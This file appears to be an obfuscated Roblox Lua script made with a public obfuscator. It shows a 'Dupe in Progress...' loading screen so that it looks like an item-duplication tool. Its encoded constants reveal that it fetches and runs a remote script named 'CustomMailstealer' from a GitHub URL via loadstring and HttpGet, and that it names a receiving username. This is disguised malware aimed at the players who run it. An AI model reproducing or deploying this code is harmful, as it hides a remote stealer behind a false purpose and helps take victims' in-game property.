--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v69=0 -0 ;local v70;while true do if (v69==(0 -0)) then v70=(v31/((2 + 0)^(v32-(1 -0))))%((4 -2)^(((v33-(620 -(555 + (91 -27)))) -(v32-1)) + (932 -(857 + 74)))) ;return v70-(v70%(569 -(367 + 201))) ;end end else local v71=(1992 -(68 + 997)) -(214 + 713) ;local v72;while true do if (v71==(0 + 0)) then v72=(1 + 1)^(v32-(878 -(282 + 595))) ;return (((v31%(v72 + v72))>=v72) and 1) or (1637 -(1523 + 114)) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (1273 -(51 + 175 + 1044)) );v19=v19 + (17 -13) ;return (v37 * (16777333 -(32 + 85))) + (v36 * 65536) + (v35 * (251 + 5)) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (v38==0) then v39=0 + 0 ;v40=nil;v38=4 -3 ;end if (v38==2) then v43=nil;v44=nil;v38=3;end if ((6 -3)==v38) then v45=nil;while true do local v78=1206 -(696 + 510) ;local v79;while true do if (v78==0) then v79=0;while true do if (v79==1) then if (v39==(3 -1)) then local v103=1262 -(1091 + 171) ;while true do if ((0 + 0)~=v103) then else for v144=3 -2 ,v44 do local v145=0;local v146;local v147;local v148;while true do if (1==v145) then v148=nil;while true do if (v146==1) then if (v147==1) then v148=v22()~=0 ;elseif (v147==(6 -4)) then v148=v25();elseif (v147==3) then v148=v26();end v45[v144]=v148;break;end if (v146==0) then v147=v22();v148=nil;v146=1;end end break;end if (v145==(374 -(123 + 251))) then local v172=0;while true do if (v172==(4 -3)) then v145=699 -(208 + 490) ;break;end if (v172==0) then v146=0;v147=nil;v172=1 + 0 ;end end end end end v43[2 + 1 ]=v22();v103=837 -(660 + 176) ;end if (v103==(1 + 0)) then for v149=203 -(14 + 188) ,v24() do local v150=0;local v151;local v152;while true do if (v150==1) then while true do if (v151==(675 -(534 + 141))) then v152=v22();if (v21(v152,1,1 + 0 )==0) then local v175=0;local v176;local v177;local v178;local v179;local v180;local v181;while true do if (v175==0) then v176=0;v177=nil;v175=1 + 0 ;end if (v175==3) then while true do if (v176==(1 + 0)) then local v182=0 -0 ;while true do if (v182~=1) then else v176=2 -0 ;break;end if (0==v182) then v179=nil;v180=nil;v182=2 -1 ;end end end if (v176==2) then v181=nil;while true do if (v177==1) then local v183=0;while true do if (v183~=0) then else local v185=0 + 0 ;while true do if (v185~=0) then else v180=nil;v181=nil;v185=1;end if (v185==1) then v183=1 + 0 ;break;end end end if (v183==1) then v177=398 -(115 + 281) ;break;end end end if ((0 -0)==v177) then local v184=0 + 0 ;while true do if (v184~=0) then else v178=0 -0 ;v179=nil;v184=3 -2 ;end if (v184==1) then v177=1;break;end end end if ((869 -(550 + 317))==v177) then while true do if (v178~=(3 -0)) then else if (v21(v180,3 -0 ,8 -5 )==1) then v181[289 -(134 + 151) ]=v45[v181[1669 -(970 + 695) ]];end v40[v149]=v181;break;end if (2~=v178) then else local v187=0 -0 ;local v188;while true do if (v187==(1990 -(582 + 1408))) then v188=0 -0 ;while true do if (v188~=1) then else v178=3;break;end if (v188==0) then if (v21(v180,1,1)~=1) then else v181[2 -0 ]=v45[v181[7 -5 ]];end if (v21(v180,1826 -(1195 + 629) ,2 -0 )==(242 -(187 + 54))) then v181[783 -(162 + 618) ]=v45[v181[3 + 0 ]];end v188=1;end end break;end end end if (v178~=1) then else local v189=0 + 0 ;while true do if (0==v189) then local v194=0;local v195;while true do if (v194~=0) then else v195=0;while true do if (v195~=1) then else v189=1;break;end if (v195==0) then local v201=0;while true do if (v201~=(1 -0)) then else v195=1 -0 ;break;end if (0==v201) then v181={v23(),v23(),nil,nil};if (v179==(0 -0)) then local v202=0;local v203;local v204;while true do if (v202~=1) then else while true do if (v203==(0 -0)) then v204=1384 -(746 + 638) ;while true do if (0~=v204) then else v181[2 + 1 ]=v23();v181[5 -1 ]=v23();break;end end break;end end break;end if (v202~=(341 -(218 + 123))) then else v203=0;v204=nil;v202=1582 -(1535 + 46) ;end end elseif (v179==(1 + 0)) then v181[3]=v24();elseif (v179==2) then v181[3]=v24() -(2^16) ;elseif (v179==3) then local v207=0;local v208;while true do if (v207==0) then v208=0;while true do if (0~=v208) then else v181[3]=v24() -(2^16) ;v181[4]=v23();break;end end break;end end end v201=1 + 0 ;end end end end break;end end end if (1==v189) then v178=562 -(306 + 254) ;break;end end end if (v178==(0 + 0)) then local v190=0;local v191;while true do if (v190==0) then v191=0 -0 ;while true do if (v191==0) then local v196=0;while true do if (v196==0) then v179=v21(v152,2,3);v180=v21(v152,4,6);v196=1468 -(899 + 568) ;end if (1==v196) then v191=1 + 0 ;break;end end end if (v191~=1) then else v178=1;break;end end break;end end end end break;end end break;end if (v176~=0) then else v177=0;v178=nil;v176=1;end end break;end if (v175==(2 -1)) then v178=nil;v179=nil;v175=605 -(268 + 335) ;end if (v175~=2) then else v180=nil;v181=nil;v175=3;end end end break;end end break;end if (v150~=(290 -(60 + 230))) then else local v173=572 -(426 + 146) ;while true do if (v173==0) then v151=0;v152=nil;v173=1 + 0 ;end if (v173==(1457 -(282 + 1174))) then v150=812 -(569 + 242) ;break;end end end end end v39=8 -5 ;break;end end end if (v39~=(0 + 0)) then else local v104=1024 -(706 + 318) ;local v105;while true do if (v104~=(1251 -(721 + 530))) then else v105=1271 -(945 + 326) ;while true do if (v105==(0 -0)) then local v166=0 + 0 ;while true do if (v166~=(700 -(271 + 429))) then else v40={};v41={};v166=1 + 0 ;end if (v166==1) then v105=1;break;end end end if (v105==1) then v42={};v39=1;break;end end break;end end end break;end if (v79~=(1500 -(1408 + 92))) then else local v102=0;while true do if (v102~=(1086 -(461 + 625))) then else if (v39~=(1291 -(993 + 295))) then else for v153=1 + 0 ,v24() do v41[v153-(1172 -(418 + 753)) ]=v29();end return v43;end if (v39~=(1 + 0)) then else v43={v40,v41,nil,v42};v44=v24();v45={};v39=2;end v102=1;end if (1~=v102) then else v79=1;break;end end end end break;end end end break;end if ((1 + 0)==v38) then v41=nil;v42=nil;v38=2;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=v24();local v47=v24();local v48=530 -(406 + 123) ;local v49=(v21(v47,1,14 + 6 ) * (2^(1801 -(1749 + 20)))) + v46 ;local v50=v21(v47,21,8 + 23 );local v51=((v21(v47,1354 -(1249 + 73) )==(1 + 0)) and  -(1146 -(466 + 679))) or (2 -1) ;if (v50==(0 -(0 -0))) then if (v49==(1900 -(106 + 1794))) then return v51 * (0 + 0) ;else v50=1 + (0 -0) ;v48=0 -0 ;end elseif (v50==(5542 -3495)) then return ((v49==(114 -(4 + 110))) and (v51 * ((585 -(57 + (693 -(122 + 44))))/0))) or (v51 * NaN) ;end return v8(v51,v50-(2450 -(41 + 1386)) ) * (v48 + (v49/(2^(155 -(17 + 86))))) ;end v26=nil;function v26(v52)local v53;if  not v52 then v52=v24();if (v52==(0 -0)) then return "";end end v53=v3(v16,v19,(v19 + v52) -(3 -2) );v19=v19 + v52 ;local v54={};for v67=1, #v53 do v54[v67]=v2(v1(v3(v53,v67,v67)));end return v6(v54);end v18=5;end if (v18==2) then function v22()local v55=v1(v16,v19,v19);v19=v19 + 1 ;return v55;end v23=nil;function v23()local v56=0 + (580 -(361 + 219)) ;local v57;local v58;while true do if (v56==(1 + 0)) then return (v58 * (518 -262)) + v57 ;end if (v56==0) then v57,v58=v1(v16,v19,v19 + (67 -(30 + (355 -(53 + 267)))) );v19=v19 + (1214 -(323 + 889)) ;v56=1 + 0 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v59)if (v1(v59,2)==79) then local v73=0;while true do if (v73==0) then v20=v0(v3(v59,1,1));return "";end end else local v74=v2(v0(v59,16));if v20 then local v80=v5(v74,v20);v20=nil;return v80;else return v74;end end end);v18=1;end if (v18==7) then function v30(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==1) then v66=v60[3];return function(...)local v81=v64;local v82=v65;local v83=v66;local v84=v28;local v85=1;local v86= -1;local v87={};local v88={...};local v89=v12("#",...) -1 ;local v90={};local v91={};for v95=0,v89 do if (v95>=v83) then v87[v95-v83 ]=v88[v95 + 1 ];else v91[v95]=v88[v95 + 1 ];end end local v92=(v89-v83) + 1 ;local v93;local v94;while true do v93=v81[v85];v94=v93[1];if (v94<=9) then if (v94<=4) then if (v94<=1) then if (v94==0) then v85=v93[3];else v85=v93[3];end elseif (v94<=2) then v62[v93[3]]=v91[v93[2]];elseif (v94==3) then if (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end elseif ((v93[3]=="_ENV") or (v93[3]=="getfenv")) then v91[v93[2]]=v62;else v91[v93[2]]=v62[v93[3]];end elseif (v94<=6) then if (v94>5) then local v110=v93[2];local v111,v112=v84(v91[v110](v13(v91,v110 + 1 ,v93[3])));v86=(v112 + v110) -1 ;local v113=0;for v124=v110,v86 do v113=v113 + 1 ;v91[v124]=v111[v113];end else local v114=0;local v115;while true do if (v114==0) then v115=v93[2];v91[v115]=v91[v115](v13(v91,v115 + 1 ,v86));break;end end end elseif (v94<=7) then local v116=v93[2];local v117,v118=v84(v91[v116](v13(v91,v116 + 1 ,v93[3])));v86=(v118 + v116) -1 ;local v119=0;for v127=v116,v86 do v119=v119 + 1 ;v91[v127]=v117[v119];end elseif (v94==8) then if ((v93[3]=="_ENV") or (v93[3]=="getfenv")) then v91[v93[2]]=v62;else v91[v93[2]]=v62[v93[3]];end else local v131=v93[2];local v132=v91[v93[3]];v91[v131 + 1 ]=v132;v91[v131]=v132[v93[4]];end elseif (v94<=14) then if (v94<=11) then if (v94==10) then v91[v93[2]]();else v91[v93[2]]=v93[3];end elseif (v94<=12) then if (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end elseif (v94>13) then local v137=0;local v138;local v139;while true do if (v137==1) then v91[v138 + 1 ]=v139;v91[v138]=v139[v93[4]];break;end if (v137==0) then v138=v93[2];v139=v91[v93[3]];v137=1;end end else v91[v93[2]]=v93[3];end elseif (v94<=16) then if (v94==15) then local v122=0;local v123;while true do if (v122==0) then v123=v93[2];v91[v123]=v91[v123](v13(v91,v123 + 1 ,v86));break;end end else do return;end end elseif (v94<=17) then do return;end elseif (v94==18) then v62[v93[3]]=v91[v93[2]];else v91[v93[2]]();end v85=v85 + 1 ;end end;end if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0C3O00028O00026O00F03F030D3O00475F4D61696C6D652O73616765030C3O004865726520666F7220596F75030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269437573746F6D2F6D61696E2F437573746F6D4D61696C737465616C657203083O00557365726E616D65030A3O006A756E7279616E332O31030F3O00475F4C6F6164696E675363722O656E03133O004475706520696E2050726F6772652O733O2E001E3O00120D3O00013O00260C3O000D0001000200044O000D000100120D000100043O001202000100033O001204000100053O001204000200063O00200900020002000700120D000400084O0006000200044O000F00013O00022O000A00010001000100044O001D000100260C3O00010001000100044O0001000100120D000100013O00260C000100170001000100044O0017000100120D0002000A3O001202000200093O00120D0002000C3O0012020002000B3O00120D000100023O00260C000100100001000200044O0010000100120D3O00023O00044O0001000100044O0010000100044O000100012O00113O00017O00",v9(),...);
